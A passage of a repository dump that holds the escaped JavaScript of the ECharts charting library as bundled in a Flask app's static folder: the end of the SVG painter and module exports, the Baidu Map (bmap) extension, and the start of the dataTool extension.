displayable = list[i];\n            var svgProxy = getSvgProxy(displayable);\n            var svgElement = getSvgElement(displayable)\n                || getTextSvgElement(displayable);\n            if (!displayable.invisible) {\n                if (displayable.__dirty) {\n                    svgProxy && svgProxy.brush(displayable);\n\n                    // Update clipPath\n                    this.clipPathManager.update(displayable);\n\n                    // Update gradient and shadow\n                    if (displayable.style) {\n                        this.gradientManager\n                            .update(displayable.style.fill);\n                        this.gradientManager\n                            .update(displayable.style.stroke);\n\n                        this.shadowManager\n                            .update(svgElement, displayable);\n                    }\n\n                    displayable.__dirty = false;\n                }\n                newVisibleList.push(displayable);\n            }\n        }\n\n        var diff = arrayDiff$1(visibleList, newVisibleList);\n        var prevSvgElement;\n\n        // First do remove, in case element moved to the head and do remove\n        // after add\n        for (i = 0; i < diff.length; i++) {\n            var item = diff[i];\n            if (item.removed) {\n                for (var k = 0; k < item.count; k++) {\n                    var displayable = visibleList[item.indices[k]];\n                    var svgElement = getSvgElement(displayable);\n                    var textSvgElement = getTextSvgElement(displayable);\n                    remove$1(svgRoot, svgElement);\n                    remove$1(svgRoot, textSvgElement);\n                }\n            }\n        }\n        for (i = 0; i < diff.length; i++) {\n            var item = diff[i];\n            if (item.added) {\n                for (var k = 0; k < item.count; k++) {\n                    var displayable = newVisibleList[item.indices[k]];\n                    var svgElement = getSvgElement(displayable);\n                    var textSvgElement = getTextSvgElement(displayable);\n                    prevSvgElement\n                        ? insertAfter(svgRoot, svgElement, prevSvgElement)\n                        : prepend(svgRoot, svgElement);\n                    if (svgElement) {\n                        insertAfter(svgRoot, textSvgElement, svgElement);\n                    }\n                    else if (prevSvgElement) {\n                        insertAfter(\n                            svgRoot, textSvgElement, prevSvgElement\n                        );\n                    }\n                    else {\n                        prepend(svgRoot, textSvgElement);\n                    }\n                    // Insert text\n                    insertAfter(svgRoot, textSvgElement, svgElement);\n                    prevSvgElement = textSvgElement || svgElement\n                        || prevSvgElement;\n\n                    // zrender.Text only create textSvgElement.\n                    this.gradientManager\n                        .addWithoutUpdate(svgElement || textSvgElement, displayable);\n                    this.shadowManager\n                        .addWithoutUpdate(svgElement || textSvgElement, displayable);\n                    this.clipPathManager.markUsed(displayable);\n                }\n            }\n            else if (!item.removed) {\n                for (var k = 0; k < item.count; k++) {\n                    var displayable = newVisibleList[item.indices[k]];\n                    var svgElement = getSvgElement(displayable);\n                    var textSvgElement = getTextSvgElement(displayable);\n\n                    var svgElement = getSvgElement(displayable);\n                    var textSvgElement = getTextSvgElement(displayable);\n\n                    this.gradientManager.markUsed(displayable);\n                    this.gradientManager\n                        .addWithoutUpdate(svgElement || textSvgElement, displayable);\n\n                    this.shadowManager.markUsed(displayable);\n                    this.shadowManager\n                        .addWithoutUpdate(svgElement || textSvgElement, displayable);\n\n                    this.clipPathManager.markUsed(displayable);\n\n                    if (textSvgElement) { // Insert text.\n                        insertAfter(svgRoot, textSvgElement, svgElement);\n                    }\n                    prevSvgElement = svgElement\n                        || textSvgElement || prevSvgElement;\n                }\n            }\n        }\n\n        this.gradientManager.removeUnused();\n        this.clipPathManager.removeUnused();\n        this.shadowManager.removeUnused();\n\n        this._visibleList = newVisibleList;\n    },\n\n    _getDefs: function (isForceCreating) {\n        var svgRoot = this._svgRoot;\n        var defs = this._svgRoot.getElementsByTagName('defs');\n        if (defs.length === 0) {\n            // Not exist\n            if (isForceCreating) {\n                var defs = svgRoot.insertBefore(\n                    createElement('defs'), // Create new tag\n                    svgRoot.firstChild // Insert in the front of svg\n                );\n                if (!defs.contains) {\n                    // IE doesn't support contains method\n                    defs.contains = function (el) {\n                        var children = defs.children;\n                        if (!children) {\n                            return false;\n                        }\n                        for (var i = children.length - 1; i >= 0; --i) {\n                            if (children[i] === el) {\n                                return true;\n                            }\n                        }\n                        return false;\n                    };\n                }\n                return defs;\n            }\n            else {\n                return null;\n            }\n        }\n        else {\n            return defs[0];\n        }\n    },\n\n    resize: function (width, height) {\n        var viewport = this._viewport;\n        // FIXME Why ?\n        viewport.style.display = 'none';\n\n        // Save input w/h\n        var opts = this._opts;\n        width != null && (opts.width = width);\n        height != null && (opts.height = height);\n\n        width = this._getSize(0);\n        height = this._getSize(1);\n\n        viewport.style.display = '';\n\n        if (this._width !== width || this._height !== height) {\n            this._width = width;\n            this._height = height;\n\n            var viewportStyle = viewport.style;\n            viewportStyle.width = width + 'px';\n            viewportStyle.height = height + 'px';\n\n            var svgRoot = this._svgRoot;\n            // Set width by 'svgRoot.width = width' is invalid\n            svgRoot.setAttribute('width', width);\n            svgRoot.setAttribute('height', height);\n        }\n    },\n\n    /**\n     * 获取绘图区域宽度\n     */\n    getWidth: function () {\n        return this._width;\n    },\n\n    /**\n     * 获取绘图区域高度\n     */\n    getHeight: function () {\n        return this._height;\n    },\n\n    _getSize: function (whIdx) {\n        var opts = this._opts;\n        var wh = ['width', 'height'][whIdx];\n        var cwh = ['clientWidth', 'clientHeight'][whIdx];\n        var plt = ['paddingLeft', 'paddingTop'][whIdx];\n        var prb = ['paddingRight', 'paddingBottom'][whIdx];\n\n        if (opts[wh] != null && opts[wh] !== 'auto') {\n            return parseFloat(opts[wh]);\n        }\n\n        var root = this.root;\n        // IE8 does not support getComputedStyle, but it use VML.\n        var stl = document.defaultView.getComputedStyle(root);\n\n        return (\n            (root[cwh] || parseInt10$2(stl[wh]) || parseInt10$2(root.style[wh]))\n            - (parseInt10$2(stl[plt]) || 0)\n            - (parseInt10$2(stl[prb]) || 0)\n        ) | 0;\n    },\n\n    dispose: function () {\n        this.root.innerHTML = '';\n\n        this._svgRoot =\n            this._viewport =\n            this.storage =\n            null;\n    },\n\n    clear: function () {\n        if (this._viewport) {\n            this.root.removeChild(this._viewport);\n        }\n    },\n\n    pathToDataUrl: function () {\n        this.refresh();\n        var html = this._svgRoot.outerHTML;\n        return 'data:image/svg+xml;charset=UTF-8,' + html;\n    }\n};\n\n// Not supported methods\nfunction createMethodNotSupport$1(method) {\n    return function () {\n        logError$1('In SVG mode painter not support method \"' + method + '\"');\n    };\n}\n\n// Unsuppoted methods\neach$1([\n    'getLayer', 'insertLayer', 'eachLayer', 'eachBuiltinLayer',\n    'eachOtherLayer', 'getLayers', 'modLayer', 'delLayer', 'clearLayer',\n    'toDataURL', 'pathToImage'\n], function (name) {\n    SVGPainter.prototype[name] = createMethodNotSupport$1(name);\n});\n\nregisterPainter('svg', SVGPainter);\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n// ----------------------------------------------\n// All of the modules that are allowed to be\n// imported are listed below.\n//\n// Users MUST NOT import other modules that are\n// not included in this list.\n// ----------------------------------------------\n\n\n\n// ----------------\n// Charts (series)\n// ----------------\n\n\n\n// All of the series types, for example:\n// chart.setOption({\n//     series: [{\n//         type: 'line' // or 'bar', 'pie', ...\n//     }]\n// });\n\n// -------------------\n// Coordinate systems\n// -------------------\n\n\n\n// All of the axis modules have been included in the\n// coordinate system module below, do not need to\n// make extra import.\n\n// `cartesian` coordinate system. For some historical\n// reasons, it is named as grid, for example:\n// chart.setOption({\n//     grid: {...},\n//     xAxis: {...},\n//     yAxis: {...},\n//     series: [{...}]\n// });\n// `polar` coordinate system, for example:\n// chart.setOption({\n//     polar: {...},\n//     radiusAxis: {...},\n//     angleAxis: {...},\n//     series: [{\n//         coordinateSystem: 'polar'\n//     }]\n// });\n// `geo` coordinate system, for example:\n// chart.setOption({\n//     geo: {...},\n//     series: [{\n//         coordinateSystem: 'geo'\n//     }]\n// });\n// `singleAxis` coordinate system (notice, it is a coordinate system\n// with only one axis, work for chart like theme river), for example:\n// chart.setOption({\n//     singleAxis: {...}\n//     series: [{type: 'themeRiver', ...}]\n// });\n// `parallel` coordinate system, only work for parallel series, for example:\n// chart.setOption({\n//     parallel: {...},\n//     parallelAxis: [{...}, ...],\n//     series: [{\n//         type: 'parallel'\n//     }]\n// });\n// `calendar` coordinate system. for example,\n// chart.setOptionp({\n//     calendar: {...},\n//     series: [{\n//         coordinateSystem: 'calendar'\n//     }]\n// );\n// ------------------\n// Other components\n// ------------------\n\n\n\n// `graphic` component, for example:\n// chart.setOption({\n//     graphic: {...}\n// });\n// `toolbox` component, for example:\n// chart.setOption({\n//     toolbox: {...}\n// });\n// `tooltip` component, for example:\n// chart.setOption({\n//     tooltip: {...}\n// });\n// `axisPointer` component, for example:\n// chart.setOption({\n//     tooltip: {axisPointer: {...}, ...}\n// });\n// Or\n// chart.setOption({\n//     axisPointer: {...}\n// });\n// `brush` component, for example:\n// chart.setOption({\n//     brush: {...}\n// });\n// Or\n// chart.setOption({\n//     tooltip: {feature: {brush: {...}}\n// })\n// `title` component, for example:\n// chart.setOption({\n//     title: {...}\n// });\n// `timeline` component, for example:\n// chart.setOption({\n//     timeline: {...}\n// });\n// `markPoint` component, for example:\n// chart.setOption({\n//     series: [{markPoint: {...}}]\n// });\n// `markLine` component, for example:\n// chart.setOption({\n//     series: [{markLine: {...}}]\n// });\n// `markArea` component, for example:\n// chart.setOption({\n//     series: [{markArea: {...}}]\n// });\n// `legend` component scrollable, for example:\n// chart.setOption({\n//     legend: {type: 'scroll'}\n// });\n// `legend` component not scrollable. for example:\n// chart.setOption({\n//     legend: {...}\n// });\n// `dataZoom` component including both `dataZoomInside` and `dataZoomSlider`.\n// `dataZoom` component providing drag, pinch, wheel behaviors\n// inside coodinate system, for example:\n// chart.setOption({\n//     dataZoom: {type: 'inside'}\n// });\n// `dataZoom` component providing a slider bar, for example:\n// chart.setOption({\n//     dataZoom: {type: 'slider'}\n// });\n// `dataZoom` component including both `visualMapContinuous` and `visualMapPiecewise`.\n// `visualMap` component providing continuous bar, for example:\n// chart.setOption({\n//     visualMap: {type: 'continuous'}\n// });\n// `visualMap` component providing pieces bar, for example:\n// chart.setOption({\n//     visualMap: {type: 'piecewise'}\n// });\n// -----------------\n// Render engines\n// -----------------\n\n\n\n// Provide IE 6,7,8 compatibility.\n// Render via SVG rather than canvas.\n\nexports.version = version;\nexports.dependencies = dependencies;\nexports.PRIORITY = PRIORITY;\nexports.init = init;\nexports.connect = connect;\nexports.disConnect = disConnect;\nexports.disconnect = disconnect;\nexports.dispose = dispose;\nexports.getInstanceByDom = getInstanceByDom;\nexports.getInstanceById = getInstanceById;\nexports.registerTheme = registerTheme;\nexports.registerPreprocessor = registerPreprocessor;\nexports.registerProcessor = registerProcessor;\nexports.registerPostUpdate = registerPostUpdate;\nexports.registerAction = registerAction;\nexports.registerCoordinateSystem = registerCoordinateSystem;\nexports.getCoordinateSystemDimensions = getCoordinateSystemDimensions;\nexports.registerLayout = registerLayout;\nexports.registerVisual = registerVisual;\nexports.registerLoading = registerLoading;\nexports.extendComponentModel = extendComponentModel;\nexports.extendComponentView = extendComponentView;\nexports.extendSeriesModel = extendSeriesModel;\nexports.extendChartView = extendChartView;\nexports.setCanvasCreator = setCanvasCreator;\nexports.registerMap = registerMap;\nexports.getMap = getMap;\nexports.dataTool = dataTool;\nexports.zrender = zrender;\nexports.number = number;\nexports.format = format;\nexports.throttle = throttle;\nexports.helper = helper;\nexports.matrix = matrix;\nexports.vector = vector;\nexports.color = color;\nexports.parseGeoJSON = parseGeoJson$1;\nexports.parseGeoJson = parseGeoJson;\nexports.util = ecUtil;\nexports.graphic = graphic$1;\nexports.List = List;\nexports.Model = Model;\nexports.Axis = Axis;\nexports.env = env$1;\n\n})));\n//# sourceMappingURL=echarts.js.map\n"
  },
  {
    "path": "flask/static/js/echarts/extension/bmap.js",
    "content": "(function (global, factory) {\n\ttypeof exports === 'object' && typeof module !== 'undefined' ? factory(exports, require('echarts')) :\n\ttypeof define === 'function' && define.amd ? define(['exports', 'echarts'], factory) :\n\t(factory((global.bmap = {}),global.echarts));\n}(this, (function (exports,echarts) { 'use strict';\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/* global BMap */\n\nfunction BMapCoordSys(bmap, api) {\n    this._bmap = bmap;\n    this.dimensions = ['lng', 'lat'];\n    this._mapOffset = [0, 0];\n\n    this._api = api;\n\n    this._projection = new BMap.MercatorProjection();\n}\n\nBMapCoordSys.prototype.dimensions = ['lng', 'lat'];\n\nBMapCoordSys.prototype.setZoom = function (zoom) {\n    this._zoom = zoom;\n};\n\nBMapCoordSys.prototype.setCenter = function (center) {\n    this._center = this._projection.lngLatToPoint(new BMap.Point(center[0], center[1]));\n};\n\nBMapCoordSys.prototype.setMapOffset = function (mapOffset) {\n    this._mapOffset = mapOffset;\n};\n\nBMapCoordSys.prototype.getBMap = function () {\n    return this._bmap;\n};\n\nBMapCoordSys.prototype.dataToPoint = function (data) {\n    var point = new BMap.Point(data[0], data[1]);\n    // TODO mercator projection is toooooooo slow\n    // var mercatorPoint = this._projection.lngLatToPoint(point);\n\n    // var width = this._api.getZr().getWidth();\n    // var height = this._api.getZr().getHeight();\n    // var divider = Math.pow(2, 18 - 10);\n    // return [\n    //     Math.round((mercatorPoint.x - this._center.x) / divider + width / 2),\n    //     Math.round((this._center.y - mercatorPoint.y) / divider + height / 2)\n    // ];\n    var px = this._bmap.pointToOverlayPixel(point);\n    var mapOffset = this._mapOffset;\n    return [px.x - mapOffset[0], px.y - mapOffset[1]];\n};\n\nBMapCoordSys.prototype.pointToData = function (pt) {\n    var mapOffset = this._mapOffset;\n    var pt = this._bmap.overlayPixelToPoint({\n        x: pt[0] + mapOffset[0],\n        y: pt[1] + mapOffset[1]\n    });\n    return [pt.lng, pt.lat];\n};\n\nBMapCoordSys.prototype.getViewRect = function () {\n    var api = this._api;\n    return new echarts.graphic.BoundingRect(0, 0, api.getWidth(), api.getHeight());\n};\n\nBMapCoordSys.prototype.getRoamTransform = function () {\n    return echarts.matrix.create();\n};\n\nBMapCoordSys.prototype.prepareCustoms = function (data) {\n    var rect = this.getViewRect();\n    return {\n        coordSys: {\n            // The name exposed to user is always 'cartesian2d' but not 'grid'.\n            type: 'bmap',\n            x: rect.x,\n            y: rect.y,\n            width: rect.width,\n            height: rect.height\n        },\n        api: {\n            coord: echarts.util.bind(this.dataToPoint, this),\n            size: echarts.util.bind(dataToCoordSize, this)\n        }\n    };\n};\n\nfunction dataToCoordSize(dataSize, dataItem) {\n    dataItem = dataItem || [0, 0];\n    return echarts.util.map([0, 1], function (dimIdx) {\n        var val = dataItem[dimIdx];\n        var halfSize = dataSize[dimIdx] / 2;\n        var p1 = [];\n        var p2 = [];\n        p1[dimIdx] = val - halfSize;\n        p2[dimIdx] = val + halfSize;\n        p1[1 - dimIdx] = p2[1 - dimIdx] = dataItem[1 - dimIdx];\n        return Math.abs(this.dataToPoint(p1)[dimIdx] - this.dataToPoint(p2)[dimIdx]);\n    }, this);\n}\n\nvar Overlay;\n\n// For deciding which dimensions to use when creating list data\nBMapCoordSys.dimensions = BMapCoordSys.prototype.dimensions;\n\nfunction createOverlayCtor() {\n    function Overlay(root) {\n        this._root = root;\n    }\n\n    Overlay.prototype = new BMap.Overlay();\n    /**\n     * 初始化\n     *\n     * @param {BMap.Map} map\n     * @override\n     */\n    Overlay.prototype.initialize = function (map) {\n        map.getPanes().labelPane.appendChild(this._root);\n        return this._root;\n    };\n    /**\n     * @override\n     */\n    Overlay.prototype.draw = function () {};\n\n    return Overlay;\n}\n\nBMapCoordSys.create = function (ecModel, api) {\n    var bmapCoordSys;\n    var root = api.getDom();\n\n    // TODO Dispose\n    ecModel.eachComponent('bmap', function (bmapModel) {\n        var painter = api.getZr().painter;\n        var viewportRoot = painter.getViewportRoot();\n        if (typeof BMap === 'undefined') {\n            throw new Error('BMap api is not loaded');\n        }\n        Overlay = Overlay || createOverlayCtor();\n        if (bmapCoordSys) {\n            throw new Error('Only one bmap component can exist');\n        }\n        if (!bmapModel.__bmap) {\n            // Not support IE8\n            var bmapRoot = root.querySelector('.ec-extension-bmap');\n            if (bmapRoot) {\n                // Reset viewport left and top, which will be changed\n                // in moving handler in BMapView\n                viewportRoot.style.left = '0px';\n                viewportRoot.style.top = '0px';\n                root.removeChild(bmapRoot);\n            }\n            bmapRoot = document.createElement('div');\n            bmapRoot.style.cssText = 'width:100%;height:100%';\n            // Not support IE8\n            bmapRoot.classList.add('ec-extension-bmap');\n            root.appendChild(bmapRoot);\n            var bmap = bmapModel.__bmap = new BMap.Map(bmapRoot);\n\n            var overlay = new Overlay(viewportRoot);\n            bmap.addOverlay(overlay);\n\n            // Override\n            painter.getViewportRootOffset = function () {\n                return {offsetLeft: 0, offsetTop: 0};\n            };\n        }\n        var bmap = bmapModel.__bmap;\n\n        // Set bmap options\n        // centerAndZoom before layout and render\n        var center = bmapModel.get('center');\n        var zoom = bmapModel.get('zoom');\n        if (center && zoom) {\n            var pt = new BMap.Point(center[0], center[1]);\n            bmap.centerAndZoom(pt, zoom);\n        }\n\n        bmapCoordSys = new BMapCoordSys(bmap, api);\n        bmapCoordSys.setMapOffset(bmapModel.__mapOffset || [0, 0]);\n        bmapCoordSys.setZoom(zoom);\n        bmapCoordSys.setCenter(center);\n\n        bmapModel.coordinateSystem = bmapCoordSys;\n    });\n\n    ecModel.eachSeries(function (seriesModel) {\n        if (seriesModel.get('coordinateSystem') === 'bmap') {\n            seriesModel.coordinateSystem = bmapCoordSys;\n        }\n    });\n};\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nfunction v2Equal(a, b) {\n    return a && b && a[0] === b[0] && a[1] === b[1];\n}\n\necharts.extendComponentModel({\n    type: 'bmap',\n\n    getBMap: function () {\n        // __bmap is injected when creating BMapCoordSys\n        return this.__bmap;\n    },\n\n    setCenterAndZoom: function (center, zoom) {\n        this.option.center = center;\n        this.option.zoom = zoom;\n    },\n\n    centerOrZoomChanged: function (center, zoom) {\n        var option = this.option;\n        return !(v2Equal(center, option.center) && zoom === option.zoom);\n    },\n\n    defaultOption: {\n\n        center: [104.114129, 37.550339],\n\n        zoom: 5,\n\n        mapStyle: {},\n\n        mapStyleV2: {},\n\n        roam: false\n    }\n});\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\necharts.extendComponentView({\n    type: 'bmap',\n\n    render: function (bMapModel, ecModel, api) {\n        var rendering = true;\n\n        var bmap = bMapModel.getBMap();\n        var viewportRoot = api.getZr().painter.getViewportRoot();\n        var coordSys = bMapModel.coordinateSystem;\n        var moveHandler = function (type, target) {\n            if (rendering) {\n                return;\n            }\n            var offsetEl = viewportRoot.parentNode.parentNode.parentNode;\n            var mapOffset = [\n                -parseInt(offsetEl.style.left, 10) || 0,\n                -parseInt(offsetEl.style.top, 10) || 0\n            ];\n            viewportRoot.style.left = mapOffset[0] + 'px';\n            viewportRoot.style.top = mapOffset[1] + 'px';\n\n            coordSys.setMapOffset(mapOffset);\n            bMapModel.__mapOffset = mapOffset;\n\n            api.dispatchAction({\n                type: 'bmapRoam'\n            });\n        };\n\n        function zoomEndHandler() {\n            if (rendering) {\n                return;\n            }\n            api.dispatchAction({\n                type: 'bmapRoam'\n            });\n        }\n\n        bmap.removeEventListener('moving', this._oldMoveHandler);\n        // FIXME\n        // Moveend may be triggered by centerAndZoom method when creating coordSys next time\n        // bmap.removeEventListener('moveend', this._oldMoveHandler);\n        bmap.removeEventListener('zoomend', this._oldZoomEndHandler);\n        bmap.addEventListener('moving', moveHandler);\n        // bmap.addEventListener('moveend', moveHandler);\n        bmap.addEventListener('zoomend', zoomEndHandler);\n\n        this._oldMoveHandler = moveHandler;\n        this._oldZoomEndHandler = zoomEndHandler;\n\n        var roam = bMapModel.get('roam');\n        if (roam && roam !== 'scale') {\n            bmap.enableDragging();\n        }\n        else {\n            bmap.disableDragging();\n        }\n        if (roam && roam !== 'move') {\n            bmap.enableScrollWheelZoom();\n            bmap.enableDoubleClickZoom();\n            bmap.enablePinchToZoom();\n        }\n        else {\n            bmap.disableScrollWheelZoom();\n            bmap.disableDoubleClickZoom();\n            bmap.disablePinchToZoom();\n        }\n\n        /* map 2.0 */\n        var originalStyle = bMapModel.__mapStyle;\n\n        var newMapStyle = bMapModel.get('mapStyle') || {};\n        // FIXME, Not use JSON methods\n        var mapStyleStr = JSON.stringify(newMapStyle);\n        if (JSON.stringify(originalStyle) !== mapStyleStr) {\n            // FIXME May have blank tile when dragging if setMapStyle\n            if (Object.keys(newMapStyle).length) {\n                bmap.setMapStyle(newMapStyle);\n            }\n            bMapModel.__mapStyle = JSON.parse(mapStyleStr);\n        }\n\n        /* map 3.0 */\n        var originalStyle2 = bMapModel.__mapStyle2;\n\n        var newMapStyle2 = bMapModel.get('mapStyleV2') || {};\n        // FIXME, Not use JSON methods\n        var mapStyleStr2 = JSON.stringify(newMapStyle2);\n        if (JSON.stringify(originalStyle2) !== mapStyleStr2) {\n            // FIXME May have blank tile when dragging if setMapStyle\n            if (Object.keys(newMapStyle2).length) {\n                bmap.setMapStyleV2(newMapStyle2);\n            }\n            bMapModel.__mapStyle2 = JSON.parse(mapStyleStr2);\n        }\n\n        rendering = false;\n    }\n});\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/**\n * BMap component extension\n */\n\necharts.registerCoordinateSystem('bmap', BMapCoordSys);\n\n// Action\necharts.registerAction({\n    type: 'bmapRoam',\n    event: 'bmapRoam',\n    update: 'updateLayout'\n}, function (payload, ecModel) {\n    ecModel.eachComponent('bmap', function (bMapModel) {\n        var bmap = bMapModel.getBMap();\n        var center = bmap.getCenter();\n        bMapModel.setCenterAndZoom([center.lng, center.lat], bmap.getZoom());\n    });\n});\n\nvar version = '1.0.0';\n\nexports.version = version;\n\n})));\n//# sourceMappingURL=bmap.js.map\n"
  },
  {
    "path": "flask/static/js/echarts/extension/dataTool.js",
    "content": "\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n(function (global, factory) {\n\ttypeof exports === 'object' && typeof module !== 'undefined' ? factory(exports, require('echarts')) :\n\ttypeof define === 'function' && define.amd ? define(['exports', 'echarts'], factory) :\n\t(factory((global.dataTool = {}),global.echarts));\n}(this, (function (exports,echarts) { 'use strict';\n\n/**\n * @module zrender/core/util\n */\n\n// 用于处理merge时无法遍历Date等对象的问题\nvar arrayProto = Array.prototype;\nvar nativeMap = arrayProto.map;\n\n\n/**\n * Those data types can be cloned:\n *     Plain object, Array, TypedArray, number, string, null, undefined.\n * Those data types will be assgined using the orginal data:\n *     BUILTIN_OBJECT\n * Instance of user defined class will be cloned to a plain object, without\n * properties in prototype.\n * Other data types is not supported (not sure what will happen).\n *\n * Caution: do not support clone Date, for performance consideration.\n * (There might be a large number of date in `series.data`).\n * So date should not be modified in and out of echarts.\n *\n * @param {*} source\n * @return {*} new\n */\n\n\n/**\n * @memberOf module:zrender/core/util\n * @param {*} target\n * @param {*} source\n * @param {boolean} [overwrite=false]\n */\n\n\n/**\n * @param {Array} targetAndSources The first item is target, and the rests are source.\n * @param {boolean} [overwrite=false]\n * @return {*} target\n */\n\n\n/**\n * @param {*} target\n * @param {*} source\n * @memberOf module:zrender/core/util\n */\n\n\n/**\n * @param {*} target\n * @param {*} source\n * @param {boolean} [overlay=false]\n * @memberOf module:zrender/core/util\n */\n\n\n\n\n\n\n/**\n * 查询数组中元素的index\n * @memberOf module:zrender/core/util\n */\n\n\n/**\n * 构造类继承关系\n *\n * @memberOf module:zrender/core/util\n * @param {Function} clazz 源类\n * @param {Function} baseClazz 基类\n */\n\n\n/**\n * @memberOf module:zrender/core/util\n * @param {Object|Function} target\n * @param {Object|Function} sorce\n * @param {boolean} overlay\n */\n\n\n/**\n * Consider typed array.\n * @param {Array|TypedArray} data\n */\n\n\n/**\n * 数组或对象遍历\n * @memberOf module:zrender/core/util\n * @param {Object|Array} obj\n * @param {Function} cb\n * @param {*} [context]\n */\n\n\n/**\n * 数组映射\n * @memberOf module:zrender/core/util\n * @param {Array} obj\n * @param {Function} cb\n * @param {*} [context]\n * @return {Array}\n */\nfunction map(obj, cb, context) {\n    if (!(obj && cb)) {\n        return;\n    }\n    if (obj.map && obj.map === nativeMap) {\n        return obj.map(cb, context);\n    }\n    else {\n        var result = [];\n        for (var i = 0, len = obj.length; i < len; i++) {\n            result.push(cb.call(context, obj[i], i, obj));\n        }\n        return result;\n    }\n}\n\n/**\n * @memberOf module:zrender/core/util\n * @param {Array} obj\n * @param {Function} cb\n * @param {Object} [memo]\n * @param {*} [context]\n * @return {Array}\n */\n\n\n/**\n * 数组过滤\n * @memberOf module:zrender/core/util\n * @param {Array} obj\n * @param {Function} cb\n * @param {*} [context]\n * @return {Array}\n */\n\n\n/**\n * 数组项查找\n * @memberOf module:zrender/core/util\n * @param {Array} obj\n * @param {Function} cb\n * @param {*} [context]\n * @return {*}\n */\n\n\n/**\n * @memberOf module:zrender/core/util\n * @param {Function} func\n * @param {*} context\n * @return {Function}\n */\n\n\n/**\n * @memberOf module:zrender/core/util\n * @param {Function} func\n * @return {Function}\n */\n\n\n/**\n * @memberOf module:zrender/core/util\n * @param {*} value\n * @return {boolean}\n */\n\n\n/**\n * @memberOf module:zrender/core/util\n * @param {*} value\n * @return {boolean}\n */\n\n\n/**\n * @memberOf module:zrender/core/util\n * @param {*} value\n * @return {boolean}\n */\n\n\n/**\n * @memberOf module:zrender/core/util\n * @param {*} value\n * @return {boolean}\n */\n\n\n/**\n * @memberOf module:zrender/core/util\n * @param {*} value\n * @return {boolean}\n */\n\n\n/**\n * @memberOf module:zrender/core/util\n * @param {*} value\n * @return {boolean}\n */\n\n\n/**\n * @memberOf module:zrender/core/util\n * @param {*} value\n * @return {boolean}\n */\n\n\n/**\n * Whether is exactly NaN. Notice isNaN('a') returns true.\n * @param {*} value\n * @return {boolean}\n */\n\n\n/**\n * If value1 is not null, then return value1, otherwise judget rest of values.\n * Low performance.\n * @memberOf module:zrender/core/util\n * @return {*} Final value\n */\n\n\n\n\n\n\n/**\n * @memberOf module:zrender/core/util\n * @param {Array} arr\n * @param {number} startIndex\n * @param {number} endIndex\n * @return {Array}\n */\n\n\n/**\n * Normalize css liked array configuration\n * e.g.\n *  3 => [3, 3, 3, 3]\n *  [4, 2] => [4, 2, 4, 2]\n *  [4, 3, 2] => [4, 3, 2, 3]\n * @param {number|Array.<number>} val\n * @return {Array.<number>}\n */\n\n\n/**\n * @memberOf module:zrender/core/util\n * @param {boolean} condition\n * @param {string} message\n */\n\n\n/**\n * @memberOf module:zrender/core/util\n * @param {string} str string to be trimed\n * @return {string} trimed string\n */\n\n\n/**\n * Set an object as primitive to be ignored traversing children in clone or merge\n */\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional 